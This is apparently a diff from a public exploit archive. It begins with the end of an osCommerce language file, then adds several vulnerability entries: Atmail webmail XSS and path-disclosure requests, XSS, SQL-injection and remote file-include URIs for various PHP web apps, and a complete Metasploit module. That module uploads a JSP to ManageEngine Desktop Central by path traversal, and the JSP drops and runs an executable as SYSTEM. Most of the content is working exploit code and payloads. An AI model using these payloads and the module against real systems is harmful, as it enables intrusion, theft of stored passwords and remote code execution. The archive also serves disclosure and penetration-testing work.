define('ENTRY_POST_CODE_ERROR', 'Your Post Code must contain a minimum of ' . ENTRY_POSTCODE_MIN_LENGTH . ' characters.');
define('ENTRY_POST_CODE_TEXT', '*');
define('ENTRY_CITY', 'City:');
define('ENTRY_CITY_ERROR', 'Your City must contain a minimum of ' . ENTRY_CITY_MIN_LENGTH . ' characters.');
define('ENTRY_CITY_TEXT', '*');
define('ENTRY_STATE', 'State/Province:');
define('ENTRY_STATE_ERROR', 'Your State must contain a minimum of ' . ENTRY_STATE_MIN_LENGTH . ' characters.');
define('ENTRY_STATE_ERROR_SELECT', 'Please select a state from the States pull down menu.');
define('ENTRY_STATE_TEXT', '*');
define('ENTRY_COUNTRY', 'Country:');
define('ENTRY_COUNTRY_ERROR', 'You must select a country from the Countries pull down menu.');
define('ENTRY_COUNTRY_TEXT', '*');
define('ENTRY_TELEPHONE_NUMBER', 'Telephone Number:');
define('ENTRY_TELEPHONE_NUMBER_ERROR', 'Your Telephone Number must contain a minimum of ' . ENTRY_TELEPHONE_MIN_LENGTH . ' characters.');
define('ENTRY_TELEPHONE_NUMBER_TEXT', '*');
define('ENTRY_FAX_NUMBER', 'Fax Number:');
define('ENTRY_FAX_NUMBER_TEXT', '');
define('ENTRY_NEWSLETTER', 'Newsletter:');
define('ENTRY_NEWSLETTER_TEXT', '');
define('ENTRY_NEWSLETTER_YES', 'Subscribed');
define('ENTRY_NEWSLETTER_NO', 'Unsubscribed');
define('ENTRY_PASSWORD', 'Password:');
define('ENTRY_PASSWORD_ERROR', 'Your Password must contain a minimum of ' . ENTRY_PASSWORD_MIN_LENGTH . ' characters.');
define('ENTRY_PASSWORD_ERROR_NOT_MATCHING', 'The Password Confirmation must match your Password.');
define('ENTRY_PASSWORD_TEXT', '*');
define('ENTRY_PASSWORD_CONFIRMATION', 'Password Confirmation:');
define('ENTRY_PASSWORD_CONFIRMATION_TEXT', '*');
define('ENTRY_PASSWORD_CURRENT', 'Current Password:');
define('ENTRY_PASSWORD_CURRENT_TEXT', '*');
define('ENTRY_PASSWORD_CURRENT_ERROR', 'Your Password must contain a minimum of ' . ENTRY_PASSWORD_MIN_LENGTH . ' characters.');
define('ENTRY_PASSWORD_NEW', 'New Password:');
define('ENTRY_PASSWORD_NEW_TEXT', '*');
define('ENTRY_PASSWORD_NEW_ERROR', 'Your new Password must contain a minimum of ' . ENTRY_PASSWORD_MIN_LENGTH . ' characters.');
define('ENTRY_PASSWORD_NEW_ERROR_NOT_MATCHING', 'The Password Confirmation must match your new Password.');
define('PASSWORD_HIDDEN', '--HIDDEN--');
define('FORM_REQUIRED_INFORMATION', '* Required information');
// constants for use in tep_prev_next_display function
define('TEXT_RESULT_PAGE', 'Result Pages:');
define('TEXT_DISPLAY_NUMBER_OF_PRODUCTS', 'Displaying <strong>%d</strong> to <strong>%d</strong> (of <strong>%d</strong> products)');
define('TEXT_DISPLAY_NUMBER_OF_ORDERS', 'Displaying <strong>%d</strong> to <strong>%d</strong> (of <strong>%d</strong> orders)');
define('TEXT_DISPLAY_NUMBER_OF_REVIEWS', 'Displaying <strong>%d</strong> to <strong>%d</strong> (of <strong>%d</strong> reviews)');
define('TEXT_DISPLAY_NUMBER_OF_PRODUCTS_NEW', 'Displaying <strong>%d</strong> to <strong>%d</strong> (of <strong>%d</strong> new products)');
define('TEXT_DISPLAY_NUMBER_OF_SPECIALS', 'Displaying <strong>%d</strong> to <strong>%d</strong> (of <strong>%d</strong> specials)');
define('PREVNEXT_TITLE_FIRST_PAGE', 'First Page');
define('PREVNEXT_TITLE_PREVIOUS_PAGE', 'Previous Page');
define('PREVNEXT_TITLE_NEXT_PAGE', 'Next Page');
define('PREVNEXT_TITLE_LAST_PAGE', 'Last Page');
define('PREVNEXT_TITLE_PAGE_NO', 'Page %d');
define('PREVNEXT_TITLE_PREV_SET_OF_NO_PAGE', 'Previous Set of %d Pages');
define('PREVNEXT_TITLE_NEXT_SET_OF_NO_PAGE', 'Next Set of %d Pages');
define('PREVNEXT_BUTTON_FIRST', '<<FIRST');
define('PREVNEXT_BUTTON_PREV', '[<<&nbsp;Prev]');
define('PREVNEXT_BUTTON_NEXT', '[Next&nbsp;>>]');
define('PREVNEXT_BUTTON_LAST', 'LAST>>');
define('IMAGE_BUTTON_ADD_ADDRESS', 'Add Address');
define('IMAGE_BUTTON_ADDRESS_BOOK', 'Address Book');
define('IMAGE_BUTTON_BACK', 'Back');
define('IMAGE_BUTTON_BUY_NOW', 'Buy Now');
define('IMAGE_BUTTON_CHANGE_ADDRESS', 'Change Address');
define('IMAGE_BUTTON_CHECKOUT', 'Checkout');
define('IMAGE_BUTTON_CONFIRM_ORDER', 'Confirm Order');
define('IMAGE_BUTTON_CONTINUE', 'Continue');
define('IMAGE_BUTTON_CONTINUE_SHOPPING', 'Continue Shopping');
define('IMAGE_BUTTON_DELETE', 'Delete');
define('IMAGE_BUTTON_EDIT_ACCOUNT', 'Edit Account');
define('IMAGE_BUTTON_HISTORY', 'Order History');
define('IMAGE_BUTTON_LOGIN', 'Sign In');
define('IMAGE_BUTTON_IN_CART', 'Add to Cart');
define('IMAGE_BUTTON_NOTIFICATIONS', 'Notifications');
define('IMAGE_BUTTON_QUICK_FIND', 'Quick Find');
define('IMAGE_BUTTON_REMOVE_NOTIFICATIONS', 'Remove Notifications');
define('IMAGE_BUTTON_REVIEWS', 'Reviews');
define('IMAGE_BUTTON_SEARCH', 'Search');
define('IMAGE_BUTTON_SHIPPING_OPTIONS', 'Shipping Options');
define('IMAGE_BUTTON_TELL_A_FRIEND', 'Tell a Friend');
define('IMAGE_BUTTON_UPDATE', 'Update');
define('IMAGE_BUTTON_UPDATE_CART', 'Update Cart');
define('IMAGE_BUTTON_WRITE_REVIEW', 'Write Review');
define('SMALL_IMAGE_BUTTON_DELETE', 'Delete');
define('SMALL_IMAGE_BUTTON_EDIT', 'Edit');
define('SMALL_IMAGE_BUTTON_VIEW', 'View');
define('ICON_ARROW_RIGHT', 'more');
define('ICON_CART', 'In Cart');
define('ICON_ERROR', 'Error');
define('ICON_SUCCESS', 'Success');
define('ICON_WARNING', 'Warning');
define('TEXT_GREETING_PERSONAL', 'Welcome back <span class="greetUser">%s!</span> Would you like to see which <a href="%s"><u>new products</u></a> are available to purchase?');
define('TEXT_GREETING_PERSONAL_RELOGON', '<small>If you are not %s, please <a href="%s"><u>log yourself in</u></a> with your account information.</small>');
define('TEXT_GREETING_GUEST', 'Welcome <span class="greetUser">Guest!</span> Would you like to <a href="%s"><u>log yourself in</u></a>? Or would you prefer to <a href="%s"><u>create an account</u></a>?');
define('TEXT_SORT_PRODUCTS', 'Sort products ');
define('TEXT_DESCENDINGLY', 'descendingly');
define('TEXT_ASCENDINGLY', 'ascendingly');
define('TEXT_BY', ' by ');
define('TEXT_REVIEW_BY', 'by %s');
define('TEXT_REVIEW_WORD_COUNT', '%s words');
define('TEXT_REVIEW_RATING', 'Rating: %s [%s]');
define('TEXT_REVIEW_DATE_ADDED', 'Date Added: %s');
define('TEXT_NO_REVIEWS', 'There are currently no product reviews.');
define('TEXT_NO_NEW_PRODUCTS', 'There are currently no products.');
define('TEXT_UNKNOWN_TAX_RATE', 'Unknown tax rate');
define('TEXT_REQUIRED', '<span class="errorText">Required</span>');
define('ERROR_TEP_MAIL', '<font face="Verdana, Arial" size="2" color="#ff0000"><strong><small>TEP ERROR:</small> Cannot send the email through the specified SMTP server. Please check your php.ini setting and correct the SMTP server if necessary.</strong></font>');
define('TEXT_CCVAL_ERROR_INVALID_DATE', 'The expiry date entered for the credit card is invalid. Please check the date and try again.');
define('TEXT_CCVAL_ERROR_INVALID_NUMBER', 'The credit card number entered is invalid. Please check the number and try again.');
define('TEXT_CCVAL_ERROR_UNKNOWN_CARD', 'The first four digits of the number entered are: %s. If that number is correct, we do not accept that type of credit card. If it is wrong, please try again.');
define('FOOTER_TEXT_BODY', 'Copyright &copy; ' . date('Y') . ' <a href="' . tep_href_link(FILENAME_DEFAULT) . '">' . STORE_NAME . '</a><br />Powered by <a href="http://www.oscommerce.com" target="_blank">osCommerce</a>');
?>
" />
<input type="submit" value="Go" />
</form>
</body>
</html>

80
platforms/php/webapps/34585.txt Executable file
View file

@ -0,0 +1,80 @@
#Title: Atmail Webmail =>7.2 - Multiple XSS & FPD
#Date: 01.27.2014
#Vendor: atmail.com
#Version: =>7.2 (Latest ATM), tested also on 7.1.1
#Authors: Smash_ & Brag / smash[at]devilteam.pl
#PoC: poczta.pl / demo.atmail.com
1. Cross Site Scripting
a) GET - viewmessageTabNumber
Request:
host/mail/index.php/mail/composemessage/index/viewmessageTabNumber/3"><h1>XSS<!--
Injection point (line 16):
<input type="hidden" name="tabId" value="viewmessageTab3"><h1>XSS<!--
PoC:
https://www.poczta.pl/mail/index.php/mail/composemessage/index/viewmessageTabNumber/3"><h1>XSS<!--
b) POST - filter
POST /mail/index.php/mail/mail/listfoldermessages/searching/true/selectFolder/INBOX.666/resultContext/searchResultsTab1 HTTP/1.1
Host: www.poczta.pl
searchQuery=&goBack=6&from=&to=&subject=&body=&filter=<script>alert(666)</script>
Alert will appear; injection point:
<div id=\"noMessageDisplay\" style=\"margin:10px;\">\n\t\t\t\tFound no messages matching <script>alert(666) (...)
c) POST - Search Results Tab
Request:
POST /mail/index.php/mail/mail/listfoldermessages/searching/true/selectFolder/INBOX/resultContext/searchResultsTab1"%20whats="up"%20bad=" HTTP/1.1
Host: http://www.poczta.pl
Injection point:
<input type=\"hidden\" name=\"resultContext\" id=\"resultContext\" value=\"searchResultsTab1\" whats=\"up\" bad=\"\" \/>
d) POST - page
Request:
POST /mail/index.php/mail/mail/listfoldermessages/selectFolder/INBOX/page/2"%20xss="true"%20bad=" HTTP/1.1
Host: www.poczta.pl
Injection point:
<input type=\"hidden\" name=\"pageNumber\" id=\"pageNumber\" value=\"2\" xss=\"true\" bad=\"\" \/>
2. Full Path Disclosure
Request (GET):
demo.atmail.com/mail/index.php/mail/mail/listfoldermessages/
Response:
An error occurred
script 'mail/listfoldermessages.phtml' not found in path (/usr/local/atmail/webmail/application/modules/mail/views/scripts/)
3. Persistent XSS - Theme Color
Request:
GET /mail/index.php/mail/settings/webmailsave?fields%5BcssColorTheme%5D=purple"%20onload=alert(666)%20bad="&save=1 HTTP/1.1
Host: www.poczta.pl
Now, whenever someone will login alert will appear.
Injection point:
<body class="leaderboard-ad-off footer-ad-off '"XSS fresh blue" onload=alert(666) bad="" id="calon">
4. Persistent XSS - Forward a Message
First, compose your message and attach an image. Image name should consist
JS code, for example: "><img src=x onerror=prompt(1)>.
Send message to a victim, whenever someone will 'Forward' the message,
JS will be executed:
<a class=\"attach-btn\" href=\"#\" onClick=\"removeAttachment('bobs.\\\"><img src=x onerror=prompt(1)> (...)
P.S - Login and password are sent as plaintext.
... which is bad.

12
platforms/php/webapps/34596.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/42967/info
Pligg CMS is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Pligg CMS 1.0.4 is vulnerable; other versions may also be affected.
The following example URIs are available:
http://www.example.com//pliggcms_1_0_4/login.php?email=sql'injection&processlogin=3&return=%2fpliggcms_1_0_4%2f
http://www.example.com/pliggcms_1_0_4/user.php?category=%22%20onmouseover%3dprompt%28938687%29%20bad%3d%22&id=&keyword=Search..&login=&module=&page=&search=&view=search

View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/42973/info
Datetopia Buy Dating Site is prone to a cross-site scripting vulnerability because the it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/profile.php?profile_id=568&s_r="><script>alert(document.cookie);</script>

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/42974/info
SZNews is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
SZNews 2.7 is vulnerable; other versions may also be affected.
http://www.example.com/path/printnews.php3?id=[shell.txt?]

14
platforms/php/webapps/34599.txt Executable file
View file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/42975/info
HotelBook is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/hotel.php?hotel_id=1'+UNION+SELECT+0,0,0,0,0,CONCAT_WS(0x3a3a3a3a3a,user_name,password,email),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+user/*
http://www.example.com/details.php?hotel_id=1'+UNION+SELECT+0,0,0,0,0,CONCAT_WS(0x3a3a,user_name,password,email),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+user/*
http://www.example.com/roomtypes.php?hotel_id=1'+UNION+SELECT+0,0,CONCAT_WS(0x3a3a3a3a3a,user_name,password,email),0,0,0,0,0,0,0,0+FROM+user/*
http://www.example.com/photos.php?hotel_id=1' << SQL >>
http://www.example.com/map.php?hotel_id=1' << SQL >>
http://www.example.com/weather.php?hotel_id=1' << SQL >>
http://www.example.com/reviews.php?hotel_id=1' << SQL >>
http://www.example.com/book.php?hotel_id=1' << SQL >>

View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/42976/info
Datetopia Match Agency BiZ is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/edit_profile.php?important="><script>alert(document.cookie);</script>

View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/42976/info
Datetopia Match Agency BiZ is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/report.php?pid="><script>alert(document.cookie);</script>

View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/42993/info
Microsoft Internet Explorer is prone to a cross-domain information-disclosure vulnerability because the application fails to enforce the same-origin policy.
An attacker can exploit this issue by enticing an unsuspecting user into viewing a page containing malicious content.
Successful exploits will allow attackers to bypass the same-origin policy and obtain potentially sensitive information; other attacks are possible.
This issue affects Internet Explorer 6, 7, and 8.
<html> <head> <style> @import url("http://www.example.com/hi_heige"); </style> <script> function loaded() { alert(document.styleSheets(0).imports(0).cssText); } </script> </head> <body onload="loaded()"> </body> </html>

169
platforms/windows/remote/34594.rb Executable file
View file

@ -0,0 +1,169 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'ManageEngine Desktop Central StatusUpdate Arbitrary File Upload',
'Description' => %q{
This module exploits an arbitrary file upload vulnerability in ManageEngine DesktopCentral
v7 to v9 build 90054 (including the MSP versions).
A malicious user can upload a JSP file into the web root without authentication, leading to
arbitrary code execution as SYSTEM. Some early builds of version 7 are not exploitable as
they do not ship with a bundled Java compiler.
},
'Author' =>
[
'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2014-5005'],
['OSVDB', '110643'],
['URL', 'http://seclists.org/fulldisclosure/2014/Aug/88'],
['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/me_dc9_file_upload.txt']
],
'Platform' => 'win',
'Arch' => ARCH_X86,
'Targets' =>
[
[ 'Desktop Central v7 to v9 build 90054 / Windows', {} ]
],
'Privileged' => true,
'DefaultTarget' => 0,
'DisclosureDate' => 'Aug 31 2014'
))
register_options([Opt::RPORT(8020)], self.class)
end
# Test for Desktop Central
def check
res = send_request_cgi({
'uri' => normalize_uri("configurations.do"),
'method' => 'GET'
})
if res && res.code == 200
build = nil
if res.body.to_s =~ /ManageEngine Desktop Central 7/ ||
res.body.to_s =~ /ManageEngine Desktop Central MSP 7/ # DC v7
print_status("#{peer} - Detected Desktop Central v7")
elsif res.body.to_s =~ /ManageEngine Desktop Central 8/ ||
res.body.to_s =~ /ManageEngine Desktop Central MSP 8/
if res.body.to_s =~ /id="buildNum" value="([0-9]+)"\/>/ # DC v8 (later versions)
build = $1
print_status("#{peer} - Detected Desktop Central v8 #{build}")
else # DC v8 (earlier versions)
print_status("#{peer} - Detected Desktop Central v8")
end
elsif res.body.to_s =~ /id="buildNum" value="([0-9]+)"\/>/ # DC v9 (and higher?)
build = $1
end
if build.nil?
return Exploit::CheckCode::Unknown
elsif Gem::Version.new(build) < Gem::Version.new("90055")
return Exploit::CheckCode::Appears
else
return Exploit::CheckCode::Safe
end
end
Exploit::CheckCode::Unknown
end
def exploit
print_status("#{peer} - Uploading JSP to execute the payload")
exe = payload.encoded_exe
exe_filename = rand_text_alpha_lower(8) + ".exe"
jsp_payload = jsp_drop_and_execute(exe, exe_filename)
jsp_name = rand_text_alpha_lower(8) + ".jsp"
send_request_cgi({
'uri' => normalize_uri('statusUpdate'),
'method' => 'POST',
'data' => jsp_payload,
'ctype' => 'text/html',
'vars_get' => {
'actionToCall' => 'LFU',
'configDataID' => '1',
'customerId' => rand_text_numeric(4),
'fileName' => '../' * 6 << jsp_name
}
})
# We could check for HTTP 200 and a "success" string.
# However only some later v8 and v9 versions return this; and we don't really care
# and do a GET to the file we just uploaded anyway.
register_files_for_cleanup(exe_filename)
register_files_for_cleanup("..\\webapps\\DesktopCentral\\#{jsp_name}")
print_status("#{peer} - Executing payload")
send_request_cgi(
{
'uri' => normalize_uri(jsp_name),
'method' => 'GET'
})
end
def jsp_drop_bin(bin_data, output_file)
jspraw = %Q|<%@ page import="java.io.*" %>\n|
jspraw << %Q|<%\n|
jspraw << %Q|String data = "#{Rex::Text.to_hex(bin_data, "")}";\n|
jspraw << %Q|FileOutputStream outputstream = new FileOutputStream("#{output_file}");\n|
jspraw << %Q|int numbytes = data.length();\n|
jspraw << %Q|byte[] bytes = new byte[numbytes/2];\n|
jspraw << %Q|for (int counter = 0; counter < numbytes; counter += 2)\n|
jspraw << %Q|{\n|
jspraw << %Q| char char1 = (char) data.charAt(counter);\n|
jspraw << %Q| char char2 = (char) data.charAt(counter + 1);\n|
jspraw << %Q| int comb = Character.digit(char1, 16) & 0xff;\n|
jspraw << %Q| comb <<= 4;\n|
jspraw << %Q| comb += Character.digit(char2, 16) & 0xff;\n|
jspraw << %Q| bytes[counter/2] = (byte)comb;\n|
jspraw << %Q|}\n|
jspraw << %Q|outputstream.write(bytes);\n|
jspraw << %Q|outputstream.close();\n|
jspraw << %Q|%>\n|
jspraw
end
def jsp_execute_command(command)
jspraw = %Q|\n|
jspraw << %Q|<%\n|
jspraw << %Q|Runtime.getRuntime().exec("#{command}");\n|
jspraw << %Q|%>\n|
jspraw
end
def jsp_drop_and_execute(bin_data, output_file)
jsp_drop_bin(bin_data, output_file) + jsp_execute_command(output_file)
end
end